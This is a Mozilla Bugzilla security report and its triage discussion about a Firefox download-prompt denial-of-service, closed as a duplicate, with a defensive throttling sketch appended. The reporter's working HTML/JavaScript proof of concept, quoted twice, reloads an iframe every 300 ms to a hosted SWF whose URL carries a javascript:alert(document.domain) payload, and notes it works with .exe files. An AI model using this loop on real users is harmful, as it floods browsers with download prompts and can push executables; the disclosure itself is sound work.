Closed Bug 1491201 Opened 6 years ago Closed 6 years ago

DOS Attack using swf file resulting an firefox browser download of death

Categories

(Firefox :: Downloads Panel, defect)


RESOLVED DUPLICATE of bug 1306334

People

(Reporter: wilsonmabutolvii, Unassigned)

Details

(Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

290.87 KB, application/x-7z-compressed
Attached file poc-firefox.7z
Firefox version: latest version 62.0, 64-bit
Operating system version: tested on Windows 10 and also on Debian Linux; this must also work on any other operating system that uses Firefox.


Hi. While I was testing for a bug bounty program on Bugcrowd, I came across a domain with an SWF file, using a JS extractor. When I clicked the SWF website URL, Firefox immediately popped up a download, whereas when I tested it in Google Chrome the SWF file was blocked and further steps were needed, asking whether to trust it or not.
So I created a simple script that can automatically download the file when a user visits a website injected with this simple script.
When a victim visits the webpage injected with the SWF JavaScript, the victim's Firefox browser will pop up a loop of downloads.

Step by step:
1. Download Firefox and update it to the latest version.
2. Search for an example SWF file. I used Google to find an example SWF file.
3. Upload the SWF. Here I used facebook.com, uploading the SWF as a chat attachment.
Optional 4. (This step applies if you use Facebook to upload the SWF.) Go to Facebook, log in with your account, go to Messages, upload the SWF file as an attachment, click the SWF and copy the URL.
5. Inject the scripts here:
<iframe src="about:blank" id="x"></iframe>
<script>u='https://cdn.fbsbx.com/v/t59.2708-21/41550622_293465564799023_112072305391173632_n.swf/swfPrintableContainer-46.swf?_nc_cat=0&oh=50ea728bf20fc5b296dcebb627a20548&oe=5B9B635A&dl=1?buttonDisabled=&buttonText=%3Ca%20%20href=%22javascript:alert(document.domain)%22%3EDOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS%3C/a%3E&buttonImageURL=/&buttonTextStyle=a{color:%23ff00ff}&buttonAction=-120&buttonCursor=-2';
setInterval(function(){document.getElementById('x').contentWindow.location=u},300)</script>

Just change the URL if you uploaded your own SWF file.

6. Go to Notepad or another editor you have, copy and paste the script, and save it as yourexamplename.html.
7. Upload it to your own web server, or just open it from your localhost in the latest Firefox version, and you will see numerous download pop-ups, which Firefox does not block as automatic download pop-ups.
Flags: sec-bounty?
Component: Security → Downloads Panel
Paolo, from a quick look at:

u='https://cdn.fbsbx.com/v/t59.2708-21/41550622_293465564799023_112072305391173632_n.swf/swfPrintableContainer-46.swf?_nc_cat=0&oh=50ea728bf20fc5b296dcebb627a20548&oe=5B9B635A&dl=1?buttonDisabled=&buttonText=%3Ca%20%20href=%22javascript:alert(document.domain)%22%3EDOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS%3C/a%3E&buttonImageURL=/&buttonTextStyle=a{color:%23ff00ff}&buttonAction=-120&buttonCursor=-2';
setInterval(function(){document.getElementById('x').contentWindow.location=u},300)

the issue here is just that we take an iframe and every 300ms point it to something that pops up a download prompt. I expect we have this on file already, is that right?
Flags: needinfo?(paolo.mozmail)
Yes, that's right, sir: take an iframe and every 300 ms it will pop up a download prompt, which Firefox doesn't block. If you test it in Google Chrome, the download will be blocked and you will be asked whether you want to unblock it, and the file will be flagged as a malicious file in the browser's download list.

I can't understand what you mean by "we have this on file already"; can you please shed some more light on this? Thanks.
If you want to make the download pop-ups faster, we just need to lower the 300 ms, for example to 100 ms.
Hi. I tested it with different file types like .cert and .exe, and it also works with these file types.
(In reply to :Gijs (he/him) from comment #1)
> the issue here is just that we take an iframe and every 300ms point it to
> something that pops up a download prompt. I expect we have this on file
> already, is that right?

Yes, and while the specifics may vary from case to case, this is basically a variant of bug 1306334.

(In reply to wilsonmabutolvii from comment #2)
> I'm cant understand about you say "we have this on file already" can you
> please shed some more light on this please, thanks

This means that we already know about this issue (as in the expression "to file a bug"). There is the bug I mentioned, and probably we have other bugs on file for specific cases too.
Flags: needinfo?(paolo.mozmail)
(In reply to :Paolo Amadini from comment #5)
> (In reply to :Gijs (he/him) from comment #1)
> > the issue here is just that we take an iframe and every 300ms point it to
> > something that pops up a download prompt. I expect we have this on file
> > already, is that right?
> 
> Yes, and while the specifics may vary from case to case, this is basically a
> variant of bug 1306334.

Yeah, it seems to be a variant of bug 1306334.

> (In reply to wilsonmabutolvii from comment #2)
> > I'm cant understand about you say "we have this on file already" can you
> > please shed some more light on this please, thanks
> 
> This means that we already know about this issue (as in the expression "to
> file a bug"). There is the bug I mentioned, and probably we have other bugs
> on file for specific cases too.

Thanks for clarifying. I think we need to implement blocking of multiple files automatically, asking the user whether they want to allow multiple downloads from this site.
(In reply to wilsonmabutolvii from comment #6)
> thanks for clarifying . I think we need to implement an blocking the
> multiple file automatically asking the user if it want to allow multiple
> download in this site.

Yes, we agree - that's why bug 1306334 is there. We can mark this bug as a duplicate.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
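One way to model the per-site throttling that the reporter and Gijs agree on above (block automatic repeat downloads and ask the user before allowing more), as an added illustration that is not Firefox code and not from the reporter's attachment. The class, method names, the per-window threshold and the simulated timestamps are all assumptions chosen for the demo.

```javascript
// Added example: a policy sketch for "block multiple automatic downloads".
// DownloadPromptGuard, decide() and allowSite() are hypothetical names;
// the thresholds are illustrative, not Firefox's actual values.

class DownloadPromptGuard {
  constructor({ maxAutomatic = 1, windowMs = 5000 } = {}) {
    this.maxAutomatic = maxAutomatic; // automatic prompts allowed per window
    this.windowMs = windowMs;
    this.history = new Map();         // origin -> recent automatic prompt times
    this.allowedSites = new Set();    // origins the user explicitly approved
  }

  // Decide what to do with a download request from top-level `origin`.
  // userInitiated: true when the request follows a user gesture (a click).
  // Returns "prompt" (show the normal download dialog) or "blocked"
  // (suppress the dialog; the UI would then offer "allow multiple downloads").
  decide(origin, now, userInitiated = false) {
    if (userInitiated || this.allowedSites.has(origin)) return "prompt";
    const recent = (this.history.get(origin) || [])
      .filter(t => now - t < this.windowMs);
    recent.push(now);
    this.history.set(origin, recent);
    return recent.length <= this.maxAutomatic ? "prompt" : "blocked";
  }

  // Called when the user answers "yes" to the allow-multiple-downloads offer.
  allowSite(origin) { this.allowedSites.add(origin); }
}

// Simulate the behaviour described in this bug: a page re-pointing an
// iframe at a download URL every 300 ms. Timestamps are constructed.
function simulateLoop(guard, origin, intervalMs = 300, count = 10) {
  const verdicts = [];
  for (let i = 0; i < count; i++) {
    verdicts.push(guard.decide(origin, i * intervalMs));
  }
  return verdicts;
}
```

With the defaults only the first automatic prompt in the window is shown; the remaining nine iterations of the loop are blocked until the user approves the site.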